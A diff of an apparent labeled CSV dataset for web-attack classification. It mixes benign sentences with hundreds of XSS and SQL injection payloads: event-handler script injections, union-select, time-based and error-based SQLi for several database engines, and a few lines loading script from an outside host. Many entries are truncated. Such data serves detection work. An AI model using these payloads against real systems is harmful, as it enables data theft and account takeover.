) or 6872 = 6872 and ( 'gyfj' = 'gyfj,2,SQLi,16289 +<image onfocusout=alert(1) tabindex=1 id=x></image,1,XSS,6679 +"-4222' ) union all select 9267,9267,9267,9267,9267",2,SQLi,13830 +"-8319"" ) ) or 7878 = 5970 and ( ( ""jcaz"" like ""jca",2,SQLi,14301 +You can save up to 41% off select devices from Ama,0,normal,25090 +Select the perfect movie for movie night.,0,normal,24111 +"<style>@keyframes x{}</style><dir style=""animation",1,XSS,6130 +>><marquee><img src=x onerror=confirm(1)></marquee,1,XSS,9708 +ORDER BY 26--,2,SQLi,10268 +<spacer id=x tabindex=1 onfocusin=alert(1)></space,1,XSS,7639 +select ( case when ( 2914 = 3335 ) then 2914 else ,2,SQLi,21673 +"UNION ALL SELECT 1,2,3,4,5--",2,SQLi,10567 +"1"" union all select null--",2,SQLi,16454 +"1 ) and elt ( 7425 = 8842,8842 ) and ( 9194 = 9194",2,SQLi,13206 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,13413 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5399 +"-1204' ) ) union all select 3585,3585--",2,SQLi,22232 +1 ) ) ) or 8156 = ( select count ( * ) from genera,2,SQLi,15598 +An update available today for the companion apps f,0,normal,26370 +<legend onfocusout=alert(1) tabindex=1 id=x></lege,1,XSS,3001 +<bdi onpointerenter=alert(1)>XSS</bdi>,1,XSS,4749 +<style>@keyframes slidein {}</style><isindex style,1,XSS,8535 +-5258 ) or ( 8459 = 8459 ) *4906,2,SQLi,18279 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,18280 +"-3860' union all select 3510,3510,3510#",2,SQLi,15768 +"<footer draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,5694 +"{""id"":null,""name"":""Gryphonmon""}",0,normal,27169 +"<figcaption draggable=""true"" ondrag=""alert(1)"">tes",1,XSS,3019 +"1"" where 5406 = 5406 and extractvalue ( 7982,conca",2,SQLi,18011 +"1"" ) ) ) and 4124 = 7245 and ( ( ( ""tuom"" = ""tuom",2,SQLi,15288 +<textarea id=x tabindex=1 onactivate=alert(1)></te,1,XSS,4078 +"1"" where 6023 = 6023",2,SQLi,16363 +<button onSelectionChange=javascript:alert(1)>,1,XSS,9667 +1'|| ( select 'akye' where 9242 = 9242 union all s,2,SQLi,20980 +ORDER BY 6,2,SQLi,10310 +"1' ) union all select null,null,null,null,null,nul",2,SQLi,12964 +-7505' ) ) as lqvw where 8565 = 8565 or 6872 = 687,2,SQLi,12445 +"{""id"":null,""firstName"":""Sam"",""lastName"":""Tan"",""add",0,normal,27213 +"<style>@keyframes slidein {}</style><table style=""",1,XSS,3498 +1' in boolean mode ) and 8407 = ( select count ( *,2,SQLi,15315 +1 where 4372 = 4372,2,SQLi,19649 +"-4453' ) ) ) or 1570 = convert ( int, ( select cha",2,SQLi,14716 +"<body BACKGROUND=""javascript:document.vulnerable=t",1,XSS,1487 +Where's the SQL documentation?,0,normal,23410 +-4055' ) ) as yoez where 3816 = 3816 or ( 8459 = 8,2,SQLi,19901 +"<strike draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,4270 +1'+ ( select wkay where 5476 = 5476 and char ( 120,2,SQLi,16410 +1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ,2,SQLi,15883 +"<xss onmouseleave=""alert(1)"" style=display:block>t",1,XSS,77 +<dd onblur=alert(1) tabindex=1 id=x></dd><input au,1,XSS,3048 +<element onpointerleave=alert(1)>XSS</element>,1,XSS,2038 +"<strike onkeypress=""alert(1)"" contenteditable>test",1,XSS,3067 +"1%' ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( (",2,SQLi,17673 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,20928 +<style>:target {color: red;}</style><thead id=x st,1,XSS,6378 +<thead onfocusout=alert(1) tabindex=1 id=x></thead,1,XSS,7874 +"1' ) where 2802 = 2802 union all select null,null,",2,SQLi,21584 +"<hgroup onmousemove=""alert(1)"">test</hgroup>",1,XSS,6930 +"&lt;SCRIPT =\""&gt;\"" SRC=\""http&#58;//ha&#46;ckers",1,XSS,1043 +Select your imagine.,0,normal,24977 +"<rtc onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,6994 +<frameset onpointerdown=alert(1)>XSS</frameset>,1,XSS,4253 +"<style>@keyframes x{}</style><cite style=""animatio",1,XSS,7553 +<style>:target {color:red;}</style><map id=x style,1,XSS,8425 +"<table><TD BACKGROUND=""javascript:document.vulnera",1,XSS,1503 +<nextid onfocusout=alert(1) tabindex=1 id=x></next,1,XSS,3856 +"<small onmouseleave=""alert(1)"">test</small>",1,XSS,5816 +Home Depot: Save up to 40% off select bath & kitch,0,normal,26088 +Where's the self-help seminar?,0,normal,23658 +"<body onbeforeunload=""location='javascript:alert(1",1,XSS,7647 +1' ) where 5287 = 5287 and 7533 = 7533--,2,SQLi,18298 +",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%",2,SQLi,10898 +Select your task.,0,normal,24850 +"-3370' in boolean mode ) union all select 3432,343",2,SQLi,19972 +<style>:target {transform: rotate(180deg);}</style,1,XSS,3601 +Select your modify.,0,normal,25040 +"<iframe src=""javascript:document.vulnerable=true; ",1,XSS,1482 +1' ) ) and 6537 = dbms_pipe.receive_message ( chr ,2,SQLi,15503 +"1%"" ) waitfor delay '0:0:5'--",2,SQLi,17119 +"<style>:target {color:red;}</style><a id=x style=""",1,XSS,7413 +1 where 2384 = 2384 and ( select * from ( select (,2,SQLi,15539 +"-6534%' ) ) or make_set ( 4107 = 9457,9457 ) and (",2,SQLi,16081 +"<content onmouseup=""alert(1)"">test</content>",1,XSS,6281 <xss onmousewheel=alert(1) style=display:block>req,1,XSS,82 -""" Then, under ""Rewards points,"" select ""American E",0,normal,26469 -1 ) ) ) or 4411 = ( select count ( * ) from sysuse,2,SQLi,13454 --3559' ) or 5903 = ( 'qqpjq'|| ( select case 5903 ,2,SQLi,21270 -"1"" ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706",2,SQLi,17412 -"1%"" ) ) ) and 8594 = ( select 8594 from pg_sleep (",2,SQLi,13081 -Plant some succulents.,0,normal,22599 -select ( case when ( 9746 = 8055 ) then 9746 else ,2,SQLi,17050 -"{""id"":null,""name"":""Staryu""}",0,normal,26834 -"Tap on ""see more,"" then select the SmileCode Scann",0,normal,25504 -<svg><html onload=alert(1)></html>,1,XSS,3823 -1' ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ,2,SQLi,21427 -Democrats will select their nominee for speaker th,0,normal,26245 -"AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,11245 -To ensure success with finer pitch requirements it,0,normal,25270 -"1, ( select ( case when ( 6857 = 7623 ) then 1 els",2,SQLi,19422 -1' ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ,2,SQLi,21600 -ORDER BY 6--,2,SQLi,10248 -<tt id=x tabindex=1 onfocusin=alert(1)></tt>,1,XSS,5045 -1' rlike ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,14347 -1%' ) ) ) and 3754 = ( select upper ( xmltype ( ch,2,SQLi,18885 -"<acronym draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,3839 -<dl onpointerup=alert(1)>XSS</dl>,1,XSS,6352 -<style>@keyframes slidein {}</style><datalist styl,1,XSS,3232 +Join the book discussion.,0,normal,22698 +"1' ) where 1323 = 1323 or extractvalue ( 1297,conc",2,SQLi,13456 +-4137 ) ) as elxu where 5672 = 5672 order by 1--,2,SQLi,21268 +"1"" ) where 4112 = 4112",2,SQLi,17410 +"1"" where 9804 = 9804 or char ( 75 ) ||char ( 70 ) ",2,SQLi,13083 +Filter the Instagram feed.,0,normal,22596 +1 and 4386 = utl_inaddr.get_host_address ( chr ( 1,2,SQLi,17048 +It's also available in select European markets as ,0,normal,25944 +Tap to select each app that you want to hide. 5.,0,normal,25501 +"<abbr draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,3825 +"make_set ( 8734 = 8734,sleep ( 5 ) )",2,SQLi,21425 +"Depending on your financial situation, select a bo",0,normal,26242 +") AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337",2,SQLi,11247 +1' ) where 6092 = 6092,2,SQLi,19507 +"1 where 4944 = 4944 union all select null,null,nul",2,SQLi,19420 +-8612' ) as toeu where 6357 = 6357 or 1570 = conve,2,SQLi,21444 +ORDER BY 8--,2,SQLi,10250 +"<br draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,5047 +"-7868' in boolean mode ) union all select 5117,511",2,SQLi,14349 +"1"" and exp ( ~ ( select * from ( select concat ( 0",2,SQLi,16675 +"<big onmousedown=""alert(1)"">test</big>",1,XSS,3841 +"<ol oncontextmenu=""alert(1)"">test</ol>",1,XSS,6354 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3234 `'><script>\xE1\xA0\x8Ejavascript:alert(1)</script,1,XSS,589 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,14341 -select,0,normal,25689 -"1"" ) as wvxt where 7321 = 7321 and 8312 = dbms_pip",2,SQLi,16740 -1' ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ,2,SQLi,16124 -Select a class to learn something new.,0,normal,24152 -Where can I select a class for personal developmen,0,normal,23835 -<xmp onpointerdown=alert(1)>XSS</xmp>,1,XSS,3280 -"<a target=""x"" href=""xssme?xss=<script>find('cookie",1,XSS,9067 -"1%' ) ) ) union all select null,null,null#",2,SQLi,15368 --3436 ) or 9281 = 3172,2,SQLi,15612 -<video autoplay onloadedmetadata=alert(1)> <source,1,XSS,4924 -"-6279' ) union all select 3026,3026,3026,3026,3026",2,SQLi,14883 -"<object ondblclick=""alert(1)"">test</object>",1,XSS,2348 -He pointed out that the performance of the Consume,0,normal,26114 -1'|| ( select 'xhqy' where 4531 = 4531 union all s,2,SQLi,14295 -Select the right size for the clothes.,0,normal,24040 -Dancer opened in select theaters in New York City ,0,normal,26248 -<svg><address onload=alert(1)></address>,1,XSS,8861 -"<nobr onmouseup=""alert(1)"">test</nobr>",1,XSS,3034 -"<figure draggable=""true"" ondragend=""alert(1)"">test",1,XSS,5290 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11967 -") or (x"")=(""x",2,SQLi,9896 -Lyft offered discounted rides on Election Day in s,0,normal,25901 -hi' or 'a' = 'a,2,SQLi,12027 -<cite onpointermove=alert(1)>XSS</cite>,1,XSS,8563 -"1"" where 9901 = 9901 and ( 2455 = 8499 ) *8499--",2,SQLi,16937 -<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;,1,XSS,1619 -<img2 onpointerleave=alert(1)>XSS</img2>,1,XSS,7046 -Select the best attraction.,0,normal,24350 -"<div onmousedown=""alert(1)"">test</div>",1,XSS,4275 -"-2377%' ) ) ) union all select 7706,7706--",2,SQLi,13389 -"AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000",2,SQLi,10412 -"<big onmouseenter=""alert(1)"">test</big>",1,XSS,1951 -))) waitfor delay '0:0:20' /*,2,SQLi,10929 -1 ) ) ) ( select ( case when ( 4587 = 4587 ) then ,2,SQLi,21034 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,18915 -&#0000060,1,XSS,1069 -Yoox: 60 percent off select merchandise from July ,0,normal,25106 -<data id=x tabindex=1 ondeactivate=alert(1)></data,1,XSS,2275 -and sleep 5--,2,SQLi,11160 -1%' ) or 5286 = ( select count ( * ) from all_user,2,SQLi,12939 -"end and ( ""xksk"" = ""xksk",2,SQLi,12446 -><img src=x onerror=javascript:alert((`1`))>,1,XSS,1266 -"-4817 union all select 7415,7415,7415,7415,7415,74",2,SQLi,12387 -<article onblur=alert(1) tabindex=1 id=x></article,1,XSS,2846 -select sleep ( 5 ) and ( ( ( 'thqr' like 'thqr,2,SQLi,21080 -<isindex onpointerout=alert(1)>XSS</isindex>,1,XSS,8775 -1' where 8584 = 8584 order by 1#,2,SQLi,21782 -Select your conquer.,0,normal,25015 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,14343 +"Select "" Submit Payment Request "" to send the requ",0,normal,25686 +"1' ) ) ) and make_set ( 8403 = 8403,8899 ) and ( (",2,SQLi,16738 +"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,16126 +Select a flavor of ice cream.,0,normal,24149 +Let's decide where to go for our anniversary.,0,normal,23832 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3282 +"<a target=""x"" href=""xssme?xss=<script>var cl=Compo",1,XSS,9069 +"1' ) ) ) or row ( 1045,7562 ) > ( select count ( *",2,SQLi,15370 +"1%"" and 9254 = ( select count ( * ) from rdb$field",2,SQLi,15614 +"<aside onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,4926 +"1 ) ) and elt ( 9288 = 6067,6067 ) and ( ( 1895 = ",2,SQLi,14885 +<style>@keyframes slidein {}</style><content style,1,XSS,2349 +"1"" and ( 7424 = 2381 ) *2381 and ""dvju"" = ""dvju",2,SQLi,17938 +"-6667%"" ) ) union all select 7348,7348,7348,7348,7",2,SQLi,14297 +Select your path.,0,normal,24784 +"1 ) ) ) union all select null,null,null,null,null#",2,SQLi,20959 +<style>:target {color:red;}</style><image id=x sty,1,XSS,8863 +"<u onmouseover=""alert(1)"">test</u>",1,XSS,3035 +"<img onmouseover=""alert(1)"">test</img>",1,XSS,5292 +"select * from users where id = 1 or "" ( ;"" or 1 = ",2,SQLi,11969 +or 1=1,2,SQLi,9898 +"You simply take lots of photos, then select your f",0,normal,25066 +"select * from users where id = 1 or ""%;"" or 1 = 1 ",2,SQLi,12029 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8565 +Join the team.,0,normal,22836 +"<;META HTTP-EQUIV="";Link""; Content="";<;http://ha.c",1,XSS,1620 +<style>:target {color:red;}</style><command id=x s,1,XSS,7048 +Please select a movie.,0,normal,24347 +"<style>@keyframes x{}</style><tr style=""animation-",1,XSS,4277 +"1"" ) ) or 5286 = ( select count ( * ) from all_use",2,SQLi,13391 +RANDOMBLOB(1000000000/2),2,SQLi,10414 +<link onfocusout=alert(1) tabindex=1 id=x></link><,1,XSS,1952 +)))) waitfor delay '0:0:20' /*,2,SQLi,10931 +1' and sleep ( 5 ) #,2,SQLi,21032 +"-7345%"" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ",2,SQLi,18913 +&#x3c,1,XSS,1070 +Select mask.,0,normal,24690 +"<audio onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,2276 +and sleep 5 and '1'='1,2,SQLi,11162 +1%' ) ) ) or 8421 = ( select count ( * ) from gene,2,SQLi,12941 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,12448 +><img src=x onerror=javascript:alert(A)>,1,XSS,1267 +-7111' or ( 8459 = 8459 ) *4906,2,SQLi,12389 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2847 +"select * from generate_series ( 2382,2382,case whe",2,SQLi,21078 +<mark id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,8777 +"{""id"":null,""firstName"":""Jerry"",""lastName"":""Loh"",""s",0,normal,27567 +Select your surpass.,0,normal,25012 <image src/onerror=prompt(8)>,1,XSS,348 -"1"" ) ) ) and sleep ( 5 ) and ( ( ( ""fdvc"" like ""fd",2,SQLi,18211 -"<multicol onclick=""alert(1)"">test</multicol>",1,XSS,2261 -"<center onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,6278 -1' ) ) or 4411 = ( select count ( * ) from sysuser,2,SQLi,17129 -Select menu.,0,normal,24533 -admin') or '1'='1'#,2,SQLi,9920 -<style onreadystatechange=alert(1)></style>,1,XSS,8745 -Select a paint color for the room.,0,normal,24219 -"</form>//[""'`-->]]>]</div>",1,XSS,9030 -1 and 3707 = ( select count ( * ) from sysibm.syst,2,SQLi,15488 -"""),(select%20if(count(*)!=-1,benchmark(3000000,MD5",2,SQLi,11020 +"1' procedure analyse ( extractvalue ( 9255,concat ",2,SQLi,18209 +"<picture oncopy=""alert(1)"" contenteditable>test</p",1,XSS,2262 +"<style>@keyframes slidein {}</style><img style=""an",1,XSS,6280 +1%' ) ) ) or 8156 = ( select count ( * ) from gene,2,SQLi,17127 +Create a memorable event for your guests.,0,normal,22991 +"1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb",2,SQLi,9922 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8747 +I'm thinking about where to take a painting class.,0,normal,23950 +"</math>//[""'`-->]]>]</div>",1,XSS,9032 +"1', ( select ( case when ( 8382 = 8382 ) then 1 el",2,SQLi,15490 +"and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11022 "<IMG SRC=""jav&#x0A;ascript:alert('XSS');"">",1,XSS,256 -"When in a store buying fabric, select your fabric ",0,normal,25157 -"<map onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,7284 -"-7083"" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr (",2,SQLi,12971 -&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT ,1,XSS,1422 -1%' ) ) ) or 7552 = ( select count ( * ) from rdb$,2,SQLi,21526 -end and ( ( ( 'hwrs' like 'hwrs,2,SQLi,16492 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,13343 -"<dt onkeypress=""alert(1)"" contenteditable>test</dt",1,XSS,6517 +When Massachusetts was called upon to select for S,0,normal,25154 +<style>:target {color: red;}</style><cite id=x sty,1,XSS,7286 +1 and 8189 = ( select count ( * ) from sysibm.syst,2,SQLi,12973 +&lt;? echo(&apos;&lt;SCR)&apos;;,1,XSS,1423 +"1"" ) ) as dvpb where 6673 = 6673",2,SQLi,21152 +-8652' ) or 4747 = dbms_utility.sqlid_to_sqlhash (,2,SQLi,16494 +1 ) ) as tuxy where 6855 = 6855 or 7552 = ( select,2,SQLi,13345 +"<xmp onmouseout=""alert(1)"">test</xmp>",1,XSS,6519 "<IMG SRC=# onmouseover=""alert('xxs')"">",1,XSS,247 -1' in boolean mode ) or sleep ( 5 ) #,2,SQLi,15067 -Select quintuple-check.,0,normal,24572 -"But if you're buying flowers online, all you need ",0,normal,26311 -select ( case when ( 5698 = 3453 ) then 5698 else ,2,SQLi,14677 -1 ) where 7552 = 7552 order by 1#,2,SQLi,14194 --7065'+ ( select 'bdxr' where 1756 = 1756 union al,2,SQLi,14865 -"<output onpaste=""alert(1)"" contenteditable>test</o",1,XSS,8776 -"<bdo onmousemove=""alert(1)"">test</bdo>",1,XSS,4607 -Insert photo.,0,normal,23060 -"-2864' ) or 1570 = convert ( int, ( select char ( ",2,SQLi,16050 -"1%"" ) ) ) and 8148 = like ( 'abcdefg',upper ( hex ",2,SQLi,16117 -"Over nearly nine years, the research team tracked ",0,normal,25795 +1 ) and 2457 = 8146,2,SQLi,15069 +Select double-check.,0,normal,24569 +But it wasn't open to all – only select partners.,0,normal,26308 +1' ) ) as oldh where 9551 = 9551 union all select ,2,SQLi,14679 +1' ) as hats where 2011 = 2011 union all select nu,2,SQLi,14196 +"-8588' union all select 2135,2135--",2,SQLi,14867 +"<style>@keyframes x{}</style><p style=""animation-n",1,XSS,8778 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4609 +Insert contact.,0,normal,23057 +-7497' ) as kjzt where 3758 = 3758 or 4794 = 9499-,2,SQLi,16052 +1' ) where 4364 = 4364 and 8594 = ( select 8594 fr,2,SQLi,16119 +Packages of 12 are available at select retailers f,0,normal,25792 <style>:target {transform: rotate(180deg);}</style,1,XSS,40 -select ( case when ( 5009 = 1133 ) then 5009 else ,2,SQLi,14180 -"/</title/'/</style/</script/--><p"" onclick=alert()",1,XSS,9552 -"-9023%"" ) ) ) union all select 4490,4490,4490#",2,SQLi,21899 -1' ) ) ) and ( select 2* ( if ( ( select * from ( ,2,SQLi,17788 -1' ) rlike ( select ( case when ( 2721 = 8716 ) th,2,SQLi,21274 -"-8566"" ) as hnch where 3418 = 3418 union all selec",2,SQLi,12635 -"-5275%' ) ) union all select 9382,9382,9382,9382,9",2,SQLi,20865 -<menu onpointerup=alert(1)>XSS</menu>,1,XSS,4571 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,17606 -"-5579%"" ) or 2724 in ( ( char ( 113 ) +char ( 113 ",2,SQLi,13564 -I want to select a dress for the upcoming party.,0,normal,23850 -"<tbody onkeypress=""alert(1)"" contenteditable>test<",1,XSS,3898 --9145' ) as xyya where 8950 = 8950 union all selec,2,SQLi,14989 -Select the nearest store.,0,normal,24460 -<label id=x tabindex=1 onactivate=alert(1)></label,1,XSS,2730 -"<spacer onmouseleave=""alert(1)"">test</spacer>",1,XSS,6851 +"1"" ) procedure analyse ( extractvalue ( 5840,conca",2,SQLi,14182 +onclick=alert(1)//<button ‘ onclick=alert(1)//> */,1,XSS,9554 +1 where 8532 = 8532,2,SQLi,21897 +"-2704"" ) union all select 1323,1323,1323,1323,1323",2,SQLi,17786 +1 ) ) order by 1#,2,SQLi,22112 +1%' ) ) ) and 3580 = ( select count ( * ) from dom,2,SQLi,12637 +-2992%' ) ) ) or 4493 = utl_inaddr.get_host_addres,2,SQLi,20863 +"<output onkeypress=""alert(1)"" contenteditable>test",1,XSS,4573 +"1%"" ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( ",2,SQLi,17604 +1'|| ( select 'qgnz' where 6446 = 6446,2,SQLi,13566 +I want to select a playlist for the road trip.,0,normal,23847 +<cite onpointerover=alert(1)>XSS</cite>,1,XSS,3900 +-8301' ) ) ) or ( 5708 = 5268 ) *5268 and ( ( ( 'h,2,SQLi,14991 +The committee will select.,0,normal,24457 +"<noframes draggable=""true"" ondragend=""alert(1)"">te",1,XSS,2731 +"<mark onkeydown=""alert(1)"" contenteditable>test</m",1,XSS,6853 \x3Cscript>javascript:alert(1)</script>,1,XSS,415 -"<style>@keyframes x{}</style><fieldset style=""anim",1,XSS,7888 -1 ) ) union all select null#,2,SQLi,18568 -"-7940%"" ) union all select 2779,2779,2779,2779,277",2,SQLi,20229 -Select your transform.,0,normal,25036 -1'+ ( select 'kqnj' where 9483 = 9483 or elt ( 587,2,SQLi,15617 -<style>@keyframes slidein {}</style><header style=,1,XSS,5068 -"1"" and 4996 = 4431 and ""jzaq"" = ""jzaq",2,SQLi,21886 -"-6220' union all select 1462,1462#",2,SQLi,13871 -"<hr onpaste=""alert(1)"" contenteditable>test</hr>",1,XSS,6334 -Join the yoga class.,0,normal,22710 -<bdo id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,5933 -"1"" union all select null,null,null,null,null,null,",2,SQLi,19721 -<style>:target {color: red;}</style><acronym id=x ,1,XSS,8066 -"{""id"":null,""name"":""Snorlax""}",0,normal,26772 -"{""id"":null,""name"":""Tepig""}",0,normal,27109 -"""For Sama"" is released in select cinemas on Septem",0,normal,26461 +"<multicol onmouseover=""alert(1)"">test</multicol>",1,XSS,7890 +"-6307' where 8916 = 8916 union all select 8916,891",2,SQLi,18566 +1 ) ) as pjjz where 8384 = 8384 and extractvalue (,2,SQLi,21719 +Select your mature.,0,normal,25033 +"1' or 8384 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,15619 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5070 +"1' where 6905 = 6905 union all select null,null,nu",2,SQLi,21884 +1 ) ) and ( select * from ( select ( sleep ( 5 ) ),2,SQLi,13873 +"<base draggable=""true"" ondrag=""alert(1)"">test</bas",1,XSS,6336 +"Drawing on these disciplines, a student may choose",0,normal,26228 +"<s onclick=""alert(1)"">test</s>",1,XSS,5935 +"1"" ) and ( 4085 = 4885 ) *4885 and ( ""sxte"" = ""sxt",2,SQLi,19719 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8068 +"1"" rlike ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,19707 +"{""id"":null,""firstName"":""Victor"",""lastName"":""Yong"",",0,normal,27107 +"""Mike Wallace is Here"" premieres in select theater",0,normal,26458 <details ontoggle=alert(1) open>test</details>,1,XSS,37 -"<meter onbeforecut=""alert(1)"" contenteditable>test",1,XSS,4188 -select * from users where id = 1 or $<\ or 1 = 1 -,2,SQLi,11826 -", exec ( 'sel' + 'ect us' + 'er' )",2,SQLi,11722 -<svg><pre onload=alert(1)></pre>,1,XSS,7253 -"<select onmousemove=""alert(1)"">test</select>",1,XSS,6399 -"-4236' ) union all select 2076,2076,2076,2076,2076",2,SQLi,22248 -1'+ ( select 'wvqj' where 3709 = 3709,2,SQLi,15933 -1%' ) ) ) and exp ( ~ ( select * from ( select con,2,SQLi,15859 -"{""id"":null,""firstName"":""Florence"",""lastName"":""Tan""",0,normal,27434 -1' where 8231 = 8231,2,SQLi,19058 -"1%' ) and 3824 = benchmark ( 5000000,md5 ( 0x76555",2,SQLi,18727 -"1"" where 3318 = 3318",2,SQLi,20896 -Select undo.,0,normal,24606 -The president can select appointees who align in t,0,normal,25392 -"union ( select NULL, NULL, NULL, ( select @@versio",2,SQLi,12013 -1 ) ) order by 1#,2,SQLi,22112 -<input type=image src=1 onerror=alert(1)>,1,XSS,1747 -1' where 4403 = 4403 rlike sleep ( 5 ) #,2,SQLi,20287 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11081 -Then I need to select the right size and click buy,0,normal,25346 -"1"" ) ) union all select null--",2,SQLi,19417 -"-6085 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( ",2,SQLi,22410 -"<rtc oncopy=""alert(1)"" contenteditable>test</rtc>",1,XSS,3956 -"{""id"":null,""firstName"":""Ayodhyala"",""lastName"":""Bha",0,normal,26873 -<dialog onpointerup=alert(1)>XSS</dialog>,1,XSS,3429 -<input id=x onfocusin=alert(1)>,1,XSS,4682 -"First, select the Allow offline mail prompt to sta",0,normal,26186 -"<kbd onkeyup=""alert(1)"" contenteditable>test</kbd>",1,XSS,8403 -1 where 9404 = 9404,2,SQLi,14239 -"<big onmouseleave=""alert(1)"">test</big>",1,XSS,4748 -1'+ ( select hsef where 4136 = 4136 or 8421 = ( se,2,SQLi,15930 -<style>:target {color:red;}</style><small id=x sty,1,XSS,6303 -<video onpointerover=alert(1)>XSS</video>,1,XSS,5493 -end and ( 'rlux' like 'rlux,2,SQLi,12808 -1' ) as ulbr where 7233 = 7233 and 7756 = dbms_uti,2,SQLi,16296 -) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AN,2,SQLi,11200 -Calculate totals where required.,0,normal,23342 -"and 1=( if((load_file(char(110,46,101,120,11 ...",2,SQLi,10108 -select,0,normal,26577 -"Up to 45% off select Power Tools, Hand Tools, and ",0,normal,25204 -"<dialog draggable=""true"" ondrag=""alert(1)"">test</d",1,XSS,5829 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10639 -user,0,normal,23169 -<style>:target {color: red;}</style><del id=x styl,1,XSS,7352 -"<hgroup onmousemove=""alert(1)"">test</hgroup>",1,XSS,6930 -"1%"" ) or sleep ( 5 ) and ( ""%"" = """,2,SQLi,20058 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7237 -cursor,0,normal,23161 -"1"" ) ) as hiuf where 3277 = 3277 and 3715 in ( ( c",2,SQLi,20276 -`'><script>\xEF\xBF\xAEjavascript:alert(526)</scri,1,XSS,8992 --7126' ) ) as fzpp where 8078 = 8078 union all sel,2,SQLi,20066 -<nav onpointermove=alert(1)>XSS</nav>,1,XSS,4862 -""") or benchmark(10000000,MD5(1))#",2,SQLi,10845 -<svg><figure onload=alert(1)></figure>,1,XSS,6909 -"select * from generate_series ( 7494,7494,case whe",2,SQLi,16505 -"1' ) where 1577 = 1577 union all select null,null,",2,SQLi,12871 -"1%"" or 9643 = ( select count ( * ) from domain.dom",2,SQLi,12437 -"1"" where 3227 = 3227 waitfor delay '0:0:5'--",2,SQLi,13492 -"<style>@keyframes x{}</style><legend style=""animat",1,XSS,8582 -1,0,normal,26693 -These he cannot remove nor select; and he is bound,0,normal,25324 -<footer onpointerdown=alert(1)>XSS</footer>,1,XSS,8251 -"<form><a href=""javascript:\u0061lert&#x28;1&#x29;""",1,XSS,1258 -"<address draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,6681 -<article onpointerdown=alert(1)>XSS</article>,1,XSS,8931 -1' ) ) as owcw where 1107 = 1107 and 8312 = dbms_p,2,SQLi,17526 --8777%' ) ) ) or ( 3934 = 2025 ) *2025 and ( ( ( ',2,SQLi,16321 -"<IMG SRC='vbscript:msgbox(""XSS"")'>",1,XSS,271 -"<samp onmouseover=""alert(1)"">test</samp>",1,XSS,2823 -"<bdi onmousedown=""alert(1)"">test</bdi>",1,XSS,1974 -"{""id"":null,""name"":""Charmander""}",0,normal,27187 --2912' ) ) order by 1--,2,SQLi,13629 -"1 where 1153 = 1153 or extractvalue ( 1297,concat ",2,SQLi,14634 -1'|| ( select 'adiv' from dual where 9842 = 9842 a,2,SQLi,16277 -"-3126 ) ) union all select 6718,6718,6718,6718,671",2,SQLi,16652 -select ( case when ( 8716 = 1338 ) then 1 else 871,2,SQLi,18431 -<mark onblur=alert(1) tabindex=1 id=x></mark><inpu,1,XSS,2771 -if ( 5316 = 4416 ) select 5316 else drop function ,2,SQLi,20273 -<colgroup onpointerup=alert(1)>XSS</colgroup>,1,XSS,2330 -<isindex id=x tabindex=1 onactivate=alert(1)></isi,1,XSS,5936 -"<iframe src=""""/srcdoc='<svg onload=alert(1)>'>",1,XSS,9468 -"1"" ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ",2,SQLi,15440 -"<style>@keyframes slidein {}</style><mark style=""a",1,XSS,7992 -<tfoot 